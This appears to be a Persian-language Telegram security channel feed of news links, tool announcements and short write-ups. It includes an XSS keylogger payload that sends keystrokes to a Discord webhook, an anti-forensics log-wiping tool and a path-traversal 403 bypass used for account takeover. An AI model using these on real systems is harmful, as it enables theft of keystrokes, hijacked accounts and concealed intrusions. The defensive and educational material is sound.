⭕️ناتو خود را برای یک "جنگ سایبری" آماده میکند.
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
حدود 150 کارشناس امنیت سایبری ناتو این هفته در استونی گردهم آمدند تا برای شبیهسازی مقابله با یک جنگ سایبری تمام عیار آماده شوند
https://www.politico.com/news/2022/12/03/nato-future-cyber-war-00072060
#cyberwar
@securation
🤩39😁6👍5😱5
⭕️ درحالی که توی کانادا مسابقات Pwn2Own 2022 در حال امادگی و برگزاری هست ، اینجا توی ایران یک مشت گاو نشستن روی کابل اینترنت فقط دنبال فیلتر کردن و قطع کانکشن های ارتباطی هستن.
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
https://www.zerodayinitiative.com/blog/2022/12/5/pwn2own-toronto-2022-the-schedule #pwn #pwn2own
@securation
Zero Day Initiative
Zero Day Initiative — Pwn2Own Toronto 2022 - The Schedule
Welcome to Pwn2Own Toronto 2022! his year marks the 10th anniversary of our consumer-focused version of the contest, and we plan on celebrating by putting some amazing research on display. For this year’s event, we have 26 contestants and teams attempting…
😢35👍9😁2👎1🤩1
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
https://www.reuters.com/business/chatgpt-owner-openai-projects-1-billion-revenue-by-2024-sources-2022-12-15/
Reuters
Exclusive: ChatGPT owner OpenAI projects $1 billion in revenue by 2024
The forecast represents how some are betting the AI tech will go far beyond splashy and sometimes flawed public demos.
👍6🔥1
⭕️ نامردا رفتن به اسم من یه بدافزار موبایلی نوشتن که تارگت هاش حسابهای بانکی افراد هست:(
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
گادفادر واقعی از این کارها نمیکنه
https://blog.cyble.com/2022/12/20/godfather-malware-returns-targeting-banking-users/
#godfather #malware
@securation
Cyble
Godfather Malware Returns: Targeting Banking Users And Online Security
The Godfather malware is back, specifically targeting banking users. Learn how this threat works and what steps you can take to protect your online banking security.
😁32👎8😢4👍3😱2
⭕️XSS Payload
Discord Keylogger
usage:
@securation
Discord Keylogger
usage:
<img src onerror='let x=!1,l="";document.onkeypress=function(a){l+=a.key,x=!0},setInterval(()=>{x&&(fetch("//discord.com/api/webhook/...",{method:"post",headers:{"Content-Type":"application/json"},body:JSON.stringify({content:l})}),x=!1)},1e3);'>
#discord #xss #bugbounty@securation
🔥20👎2👍1
ASIS CTF Finals 2022 (1725)
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
Jeopardy
Fri, December 30, 2022 14:30 UTC+00:00
Weight: 98 points
Duration: 1 day
ctftime.org
ASIS CTF Finals 2022
ASIS CTF Finals 2022 CTF event
🔥13👎3😢1
Google Releases Open-Source Vulnerability Scanning Tool
https://www.infoq.com/news/2022/12/google-osv-scanner/
https://www.infoq.com/news/2022/12/google-osv-scanner/
InfoQ
Google Releases Open-Source Vulnerability Scanning Tool
Google has released OSV-Scanner, an open-source front-end interface to the Open Source Vulnerability (OSV) database. The OSV database is a distributed, open-source database that stores vulnerability information in the OSV format. The OSV-Scanner assesses…
😢6👍1
⭕️linWinPwn
#ad #enum
@securation
bash script that automates a number of Active Directory Enumeration and Vulnerability checks
https://github.com/lefayjey/linWinPwn#ad #enum
@securation
GitHub
GitHub - lefayjey/linWinPwn: linWinPwn is a bash script that streamlines the use of a number of Active Directory tools
linWinPwn is a bash script that streamlines the use of a number of Active Directory tools - lefayjey/linWinPwn
👍11
⭕️RCE via SSTI on Spring Boot Error Page with Akamai WAF Bypass
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
https://h1pmnh.github.io/post/writeup_spring_el_waf_bypass/
#rce #ssti
@securation
👍9
⭕️ Offensive Security & Reverse Engineering Course
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
https://github.com/ashemery/exploitation-course
#reverse #pwn #exploit #offensive
@securation
🤩6👍1
⭕️ اینجا قبلا درمورد نشر و نصب انواع بدافزارها بخاطر افزایش فیلترینگ و سانسور و مراجعه مردم به نصب انواع VPN های ناامن مطلبی نوشته بودم.
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
حالا بیت دفندر در اینجا گزارش داده که بدافزاری در قالب Vpn کاربران ایرانی رو هک میکرده.
این بدافزار به نام 20speed vpn فعالیت میکرده که بیشترین کاربر هک شده ی آن ایرانی هستند.
نتیجه ی تصمیم های چند احمق در جایگاه مسئول در ایران باعث رونق بدافزارها و در خطر افتادن حریم خصوصی مردم و همچنین امنیت مِلی گردیده است.
#فیلترینگ #سانسور
#بدافزار #فیلترشکن
@securation
👍41😱4👎2🔥1😢1🤩1
⭕️از مهم ترین اقدامات Pentest و Redteam تکنیک های Anti Forensic است، ابزاری اخیرا منتشر شده که تکنیک های زیر را در بر میگیرد:
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
Unloading Sysmon Driver.
Gutmann Method File Shredding.
USNJrnl Disabler.
Prefetch Disabler.
Log Eraser and Event log Disabler.
User Assist Update Time Disabler.
Access Time Disabler.
Clear Recent Items
Clear Shim Cache
Clear RecentFileCache
Clear ShellBag
File Melting Capabilities.
https://github.com/PaulNorman01/Forensia
#redteam #antiforensic
@securation
GitHub
GitHub - PaulNorman01/Forensia: Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase.
Anti Forensics Tool For Red Teamers, Used For Erasing Footprints In The Post Exploitation Phase. - PaulNorman01/Forensia
👍13🔥1😢1
⭕️ اگر به موضوعات kiosk breakout و atm hacking علاقه مند هستید پیشنهاد میکنم نظاره گر این مقاله باشید.
مقاله زیر حول محورهای مختلفی مانند:
ATM Internals
Insufficient physical security
Insufficient configuration of the system and peripheral devices
Insufficient network security
و توصیه های Hardening این حملات است.
https://blog.nviso.eu/2023/01/10/malware-based-attacks-on-atms-a-summary/
#redteam #kioskbreakout #atmhacking
@securation
مقاله زیر حول محورهای مختلفی مانند:
ATM Internals
Insufficient physical security
Insufficient configuration of the system and peripheral devices
Insufficient network security
و توصیه های Hardening این حملات است.
https://blog.nviso.eu/2023/01/10/malware-based-attacks-on-atms-a-summary/
#redteam #kioskbreakout #atmhacking
@securation
NVISO Labs
Malware-based attacks on ATMs – A summary
Introduction Today we will take a first look at malware-based attacks on ATMs in general, while future articles will go into more detail on the individual subtopics. ATMs have been robbed by crimin…
👍10😢3👎2🔥2😱1
⭕️ در پروسه تحلیل ترافیک و Network Forensic ما از ابزار های مختلفی استفاده میکنیم.
گاهی ابزار هایی تولید میشود که کار را راحت کرده و ترکیبی از ابزار های مختلف خواهد بود.
ابزار brim security یک ابزار تحلیل ترافیک تحتِ وب است که خروجی ترافیک wireshark که فایل های pcap هستند را به zeek داده و خروجی تحلیل را به ما نشان میدهد.
همچنین میتوان از ابزار های خوب مانند omnipeek
https://kifarunix.com/analyze-network-traffic-using-brim-security/
#Forensic #AnalyzeNetwork #blueteam
@securation
گاهی ابزار هایی تولید میشود که کار را راحت کرده و ترکیبی از ابزار های مختلف خواهد بود.
ابزار brim security یک ابزار تحلیل ترافیک تحتِ وب است که خروجی ترافیک wireshark که فایل های pcap هستند را به zeek داده و خروجی تحلیل را به ما نشان میدهد.
همچنین میتوان از ابزار های خوب مانند omnipeek
نیز برای این کار استفاده کرد.https://kifarunix.com/analyze-network-traffic-using-brim-security/
#Forensic #AnalyzeNetwork #blueteam
@securation
kifarunix.com
Analyze Network Traffic Using Brim Security - kifarunix.com
In this tutorial, you will learn how you can analyze network traffic using Brim security tool. Brim is an open source desktop application that can be used to
👍14
⭕️
وبسایت باج افزار Hive الان لوگوی FBI روی اون هست و متوقف شده است.
همزمان با توقیف زیرساخت های باج افزار Hive توسط امریکا، وبسایت های پاداش برای عدالت وزارت دادگستری آمریکا، CIA، FBI و وزارت خارجه آمریکاو بخش روسی شرکت تلویزیون و رادیو ملی سوئیس در روسیه مسدود شد
https://roskomsvoboda.org/post/block-cia-fbi-statdep/
1- https://reestr.rublacklist.net/ru/record/5368745/
2- https://reestr.rublacklist.net/ru/record/5368747/
3-
https://reestr.rublacklist.net/ru/record/5368354/
#ransomware #russia #FBI
@securation
آخر جولای 2022 FBI تونسته بود به زیرساخت باج افزار Hive نفوذ کنه و کلید رمزگشایی این باج افزار رو بدست بیاره که موجب جلوگیری از ۱۲۰ میلیون دلار باج گیری شد.وبسایت باج افزار Hive الان لوگوی FBI روی اون هست و متوقف شده است.
همزمان با توقیف زیرساخت های باج افزار Hive توسط امریکا، وبسایت های پاداش برای عدالت وزارت دادگستری آمریکا، CIA، FBI و وزارت خارجه آمریکاو بخش روسی شرکت تلویزیون و رادیو ملی سوئیس در روسیه مسدود شد
.
لینک خبر :https://roskomsvoboda.org/post/block-cia-fbi-statdep/
1- https://reestr.rublacklist.net/ru/record/5368745/
2- https://reestr.rublacklist.net/ru/record/5368747/
3-
https://reestr.rublacklist.net/ru/record/5368354/
#ransomware #russia #FBI
@securation
www.justice.gov
U.S. Department of Justice Disrupts Hive Ransomware Variant
The Justice Department announced today its months-long disruption campaign against the Hive ransomware group that has targeted more than 1,500 victims in over 80 countries around the world, including hospitals, school districts, financial firms, and critical…
👍12😁7
⭕️Microsoft Exchange: OWASSRF + TabShell
(CVE-2022-41076)
The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.
For a detailed write see research:
https://blog.viettelcybersecurity.com/tabshell-owassrf/
PoC:
https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e
#owa #ssrf #tabshell #poc
@securation
(CVE-2022-41076)
The TabShell vulnerability its a form of Privilege Escalation which allows breaking out of the restricted Powershell Sandbox after you have successfully gained access through OWASSRF.
For a detailed write see research:
https://blog.viettelcybersecurity.com/tabshell-owassrf/
PoC:
https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e
#owa #ssrf #tabshell #poc
@securation
🔥6🎉1
⭕️اگر Sccm Current Branch Unleashed را کانفیگ کرده باشید در فرایند نصب سایت به نکته ای جالب بر خواهید خورد.
computer account مربوط به سایت اصلی باید عضو گروه local admin sql sever باشد.
حال این موضوع به این معنی است که:
متصل شدن سایت ها و push شدن کلاینت ها بصورت خودکار اتفاق می افتد.
بصورت پیشفرض مکانیزم احراز هویت به ntlm بازمیگردد،بصورت پیشفرض در احراز هویت کلاینت ها pki cert الزام نیست و mssql در سرور دیتابیس سایت در دسترس است ، البته smb sign ملزوم نیست.
پس عملا با تصاحب سایت sccm که با اجبار کردن احراز هویت با ntlm و انقال آن به سرور پایگاه داده سایت و استفاده از عبارت هویت mssql منجر به full admin شده و به تمامی بخش های سایت مشرف بوده و میتوان آنها را کنترل کرد.
++ برای جلوگیری از این مشکل چه باید کرد:
- نصب hotfix
- فعال کردن extended protection بر روی mssql
- فعال کردن smb sign برای سرور های درون سایت
- بلاک کردن ارتباطات sql و smb از سیستم های غیر ضروری به سرور های سایت
- ملزوم کردن pki cert بر روی کلاینت ها
- در عوض نصب خودکار آپدیت ها از نصب مبتنی بر نرم افزار، group policy و دستی اقدام شود.
https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1#a2e2
#redteam #hardening #sccm #blueteam
@securation
computer account مربوط به سایت اصلی باید عضو گروه local admin sql sever باشد.
حال این موضوع به این معنی است که:
متصل شدن سایت ها و push شدن کلاینت ها بصورت خودکار اتفاق می افتد.
بصورت پیشفرض مکانیزم احراز هویت به ntlm بازمیگردد،بصورت پیشفرض در احراز هویت کلاینت ها pki cert الزام نیست و mssql در سرور دیتابیس سایت در دسترس است ، البته smb sign ملزوم نیست.
پس عملا با تصاحب سایت sccm که با اجبار کردن احراز هویت با ntlm و انقال آن به سرور پایگاه داده سایت و استفاده از عبارت هویت mssql منجر به full admin شده و به تمامی بخش های سایت مشرف بوده و میتوان آنها را کنترل کرد.
++ برای جلوگیری از این مشکل چه باید کرد:
- نصب hotfix
- فعال کردن extended protection بر روی mssql
- فعال کردن smb sign برای سرور های درون سایت
- بلاک کردن ارتباطات sql و smb از سیستم های غیر ضروری به سرور های سایت
- ملزوم کردن pki cert بر روی کلاینت ها
- در عوض نصب خودکار آپدیت ها از نصب مبتنی بر نرم افزار، group policy و دستی اقدام شود.
https://posts.specterops.io/sccm-site-takeover-via-automatic-client-push-installation-f567ec80d5b1#a2e2
#redteam #hardening #sccm #blueteam
@securation
SpecterOps
SCCM Site Takeover via Automatic Client Push Installation - SpecterOps
Vulnerability alert: SCCM site takeover revealed. Watch a demo of the attack path and learn how to secure your system against this threat.
🔥6👍2
⭕ تصاحب حساب کاربری
تو این مقاله یک تکنیک جالب بایپس 403 در API بررسی میشه
اندپوینت زیر در صورت ارسال درخواست کد 403 میده و میگه دسترسی ندارید
تست نفوذگر اینجا با یک تکنیک ساده از traversal sequence استفاده کرده و در ادامه اش از UserID قربانی استفاده کرده
و در اینجا کد 200 گرفته و با موفقیت ایمیل قربانی رو تغییر داده
لینک مقاله:
https://gonzxph.medium.com/account-takeover-worth-of-2500-e643661f94e9
تحلیل: به نظر میاد برنامه نویس اینجا اومده Requests URI رو گرفته و چک کرده که آیا DemoUserID در organization وجود داره یا خیر؟ اگر وجود نداشت به کاربر بگه که شما دسترسی این کار رو ندارید و اگر وجود داشت بنظر میاد این درخواست برای سرویس دیگه ای که مسئول تغییر ایمیل بوده ارسال شده
در اینجا ما ۲ تا زبان مختلف پایتون و php رو در مواجه با این موضوع تست کردیم تا ببینم رفتار این ها با traversal sequence به چه صورت هست؟( traversal sequence هم همون /.. هست). و آیا path normalization دارند؟ ( یعنی فانکشن با لایبرری بیاد traversal sequence هارو apply کنه و مسیر یا path به اصطلاح normalize بشه
لینک مرتبط با path normalization اگر خواستید مطالعه کنید
https://en.wikipedia.org/wiki/URI_normalization
در اینجا یک سرور apache بالا آوردیم و بهش درخواست ارسال کردیم
درخواست اول با پایتون به این صورت
درخواست دوم با php به این صورت
نتایج جالب بود
لاگ سرور آپاچی:
این یعنی لایبرری requests پایتون اینجا path normalization رو اپلای کرده و php این کار رو نکرده
این تست هایی که انجام دادیم صرفا نشان دهنده این هستند که رفتار زبان و لایبرری و فریمورک های مختلف فرق میکنه.
حالا برگردیم به آسیب پذیری ای که داشتیم توضیحش میدادیم
گفتیم بعد از بررسی request uri برنامه نویس میاد این رو به سرویس دیگه ای ارسال میکنه حالا اگر این ارسال کردن با زبانی یا لایبرری اتفاق بیفته که path normalization انجام بده آسیب پذیری وجود داره و اگر انجام نده آسیب پذیری وجود نداره.
این ها صرفا یک فرض بود و ممکنه موضوع به طور کل چیز دیگه ای باشه ولی خب ما نیاز داشتیم یکم دیپ بشیم و ببینم موضوع از چه قرار هست
#ATO #bypass403
@securation
تو این مقاله یک تکنیک جالب بایپس 403 در API بررسی میشه
اندپوینت زیر در صورت ارسال درخواست کد 403 میده و میگه دسترسی ندارید
POST /<organizationID>/addEmail/<DemoUserID>/تست نفوذگر اینجا با یک تکنیک ساده از traversal sequence استفاده کرده و در ادامه اش از UserID قربانی استفاده کرده
POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/و در اینجا کد 200 گرفته و با موفقیت ایمیل قربانی رو تغییر داده
لینک مقاله:
https://gonzxph.medium.com/account-takeover-worth-of-2500-e643661f94e9
تحلیل: به نظر میاد برنامه نویس اینجا اومده Requests URI رو گرفته و چک کرده که آیا DemoUserID در organization وجود داره یا خیر؟ اگر وجود نداشت به کاربر بگه که شما دسترسی این کار رو ندارید و اگر وجود داشت بنظر میاد این درخواست برای سرویس دیگه ای که مسئول تغییر ایمیل بوده ارسال شده
در اینجا ما ۲ تا زبان مختلف پایتون و php رو در مواجه با این موضوع تست کردیم تا ببینم رفتار این ها با traversal sequence به چه صورت هست؟( traversal sequence هم همون /.. هست). و آیا path normalization دارند؟ ( یعنی فانکشن با لایبرری بیاد traversal sequence هارو apply کنه و مسیر یا path به اصطلاح normalize بشه
لینک مرتبط با path normalization اگر خواستید مطالعه کنید
https://en.wikipedia.org/wiki/URI_normalization
در اینجا یک سرور apache بالا آوردیم و بهش درخواست ارسال کردیم
درخواست اول با پایتون به این صورت
import requests
requests.get("http://server/a/b/../c")درخواست دوم با php به این صورت
file_get_contents("http://server/a/b/../c");نتایج جالب بود
لاگ سرور آپاچی:
"GET /a/c HTTP/1.1" 404 492 "-" "python-requests/2.28.1""GET /a/b/../c HTTP/1.1" 404 455 "-" "-"این یعنی لایبرری requests پایتون اینجا path normalization رو اپلای کرده و php این کار رو نکرده
این تست هایی که انجام دادیم صرفا نشان دهنده این هستند که رفتار زبان و لایبرری و فریمورک های مختلف فرق میکنه.
حالا برگردیم به آسیب پذیری ای که داشتیم توضیحش میدادیم
گفتیم بعد از بررسی request uri برنامه نویس میاد این رو به سرویس دیگه ای ارسال میکنه حالا اگر این ارسال کردن با زبانی یا لایبرری اتفاق بیفته که path normalization انجام بده آسیب پذیری وجود داره و اگر انجام نده آسیب پذیری وجود نداره.
این ها صرفا یک فرض بود و ممکنه موضوع به طور کل چیز دیگه ای باشه ولی خب ما نیاز داشتیم یکم دیپ بشیم و ببینم موضوع از چه قرار هست
#ATO #bypass403
@securation
Medium
Account Takeover Worth of $2500
whoami?
👍22🔥1🤩1